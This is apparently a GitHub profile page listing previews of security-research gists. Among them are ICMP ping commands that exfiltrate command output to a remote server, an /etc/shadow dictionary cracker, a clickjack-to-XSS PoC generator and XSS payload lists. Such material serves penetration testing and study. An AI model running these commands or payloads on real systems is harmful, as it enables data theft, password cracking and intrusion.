Skip to content

Instantly share code, notes, and snippets.

View arbazkiraak's full-sized avatar
Focusing

Arbaz Hussain arbazkiraak

Focusing
350 followers · 1.1k following
View GitHub Profile
@henrik
henrik / tmux_cheatsheet.markdown
Created March 3, 2012 19:47
tmux cheatsheet

tmux cheatsheet

As configured in my dotfiles.

start new:

tmux

start new with session name:

@evilpacket
evilpacket / gist:3628941
Created September 5, 2012 01:35
Top 1000 from Alexa Top 1million
wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv|head -1000 > top-1000.txt; rm top-1m.csv*
@yeukhon
yeukhon / test.html
Last active December 14, 2021 14:08
Simple XSS detector using PhantomJS
<html>
<head></head>
<body>
<a href="javascript: alert('clicked xss link')" id="link">click me</a>
<img src="xx" onerror="alert('xss')" />
</body>
</html>
@Lazza
Lazza / README.md
Last active April 16, 2024 09:36
VPNGate Python script

This script is NOT MAINTAINED

This snippet of code was posted in 2014 and slightly revised in 2016 and 2017. It was more of a quick'n'dirty script than a polished tool. It is made only for Linux and in Python 2, which has since become outdated.

I currently do not use it, and I suggest you avoid it as well. Please do not expect support for using this script.

🔥 If you need an alternative, @glaucocustodio has kindly suggested EasyVPN in this comment.

The rest of the README is left for historical purposed.

@vishwaraj101
vishwaraj101 / cxp.py
Last active March 11, 2023 16:13
clickjack to xss poc
print "Clickjack to Xss"
vector=raw_input('xss vector--> ') #xss payload
html=raw_input('Custom Iframe Code--> ') #custom iframe code
fo=open('exploit.html','w') #creating html file
source_code="""<html><body>
<h1>Clickjack to exploit self xss </h1>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
"""%(vector)
@aadityapurani
aadityapurani / shadowcracker.py
Last active November 18, 2017 02:40
#/etc/shadow Bruteforcer
#Coded by Aaditya Purani
#Just for Fun after Remote Exploitation
#It will crack shadow password by Dictionary attack
import optparse
import crypt
def checkPass(cryptPass, dname):
salt = "$"+cryptPass.split('$')[1]+"$"+cryptPass.split('$')[2]
@marcelitocs
marcelitocs / golang-on-rpi.md
Last active July 1, 2023 22:24 — forked from konradko/golang_on_rpi.md
Install Golang 1.8 on Raspberry Pi 
wget https://storage.googleapis.com/golang/go1.8.linux-armv6l.tar.gz
tar -C /usr/local -xzf go1.8.linux-armv6l.tar.gz
export PATH=$PATH:/usr/local/go/bin
@jobertabma
jobertabma / icmp.md
Last active September 14, 2022 15:02
Commands to exfiltrate command output via ICMP packet size
  1. Capture ICMP packets on your server:
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap
  1. Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:
ip=vm03;output=`hostname`;for ((i=0;i&lt;${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done
@tomnomnom
tomnomnom / alert.js
Last active June 1, 2024 15:07
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@rootxharsh
rootxharsh / reconme.txt
Last active February 27, 2020 16:27
Aquatone and gowitness
alias reconme='function frecon()
{
mkdir $1
$HOME/./gowitness --chrome-path=/usr/bin/google-chrome file --source=$HOME/aquatone/$1/urls.txt -d $1/ -$
$HOME/./gowitness --chrome-path=/usr/bin/google-chrome -D /var/www/html/recon/$1/.gowitness-$1.db gene$
mv report.html $1/report-$1.html
sed -i -e 's%var\/www\/html\/%%g' $1/report-$1.html
chown -R www-data:www-data /var/www/html/recon
touch /var/www/html/recon/$1/index.html